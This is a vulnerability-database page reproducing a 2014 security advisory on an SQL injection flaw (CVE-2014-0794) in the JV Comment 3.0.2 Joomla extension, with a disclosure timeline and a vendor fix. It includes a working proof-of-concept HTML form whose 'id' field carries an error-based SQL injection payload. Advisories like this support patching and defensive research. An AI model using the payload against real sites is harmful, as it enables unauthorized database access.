Lucene search
K

Joomla JV Comment 3.0.2 SQL Injection Vulnerability

🗓️ 24 Jan 2014 00:00:00Reported by High-Tech BridgeType 
zdt
 zdt
🔗 0day.today👁 54 Views

SQL Injection Vulnerability in JV Comment Joomla Extension version 3.0.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-0794
26 Jan 201420:00
cve
Cvelist
CVE-2014-0794
26 Jan 201420:00
cvelist
Exploit DB
Joomla! Component JV Comment 3.0.2 - 'id' SQL Injection
24 Jan 201400:00
exploitdb
EUVD
EUVD-2014-0825
7 Oct 202500:30
euvd
exploitpack
Joomla! Component JV Comment 3.0.2 - id SQL Injection
24 Jan 201400:00
exploitpack
htbridge
SQL Injection in JV Comment Joomla Extension
2 Jan 201400:00
htbridge
NVD
CVE-2014-0794
26 Jan 201420:55
nvd
Packet Storm
Joomla JV Comment 3.0.2 SQL Injection
24 Jan 201400:00
packetstorm
Prion
Sql injection
26 Jan 201420:55
prion
securityvulns
SQL Injection in JV Comment Joomla Extension
3 Feb 201400:00
securityvulns
Rows per page
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication:  January 2, 2014  [without technical details]
Vendor Notification: January 2, 2014 
Vendor Patch: January 14, 2014 
Public Disclosure: January 23, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.


1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794

The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example displays version of MySQL database:


<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task"   value="comment.like">
<input type="hidden" name="id"     value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Update to JV Comment 3.0.3

More Information:
http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2014 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.00017
54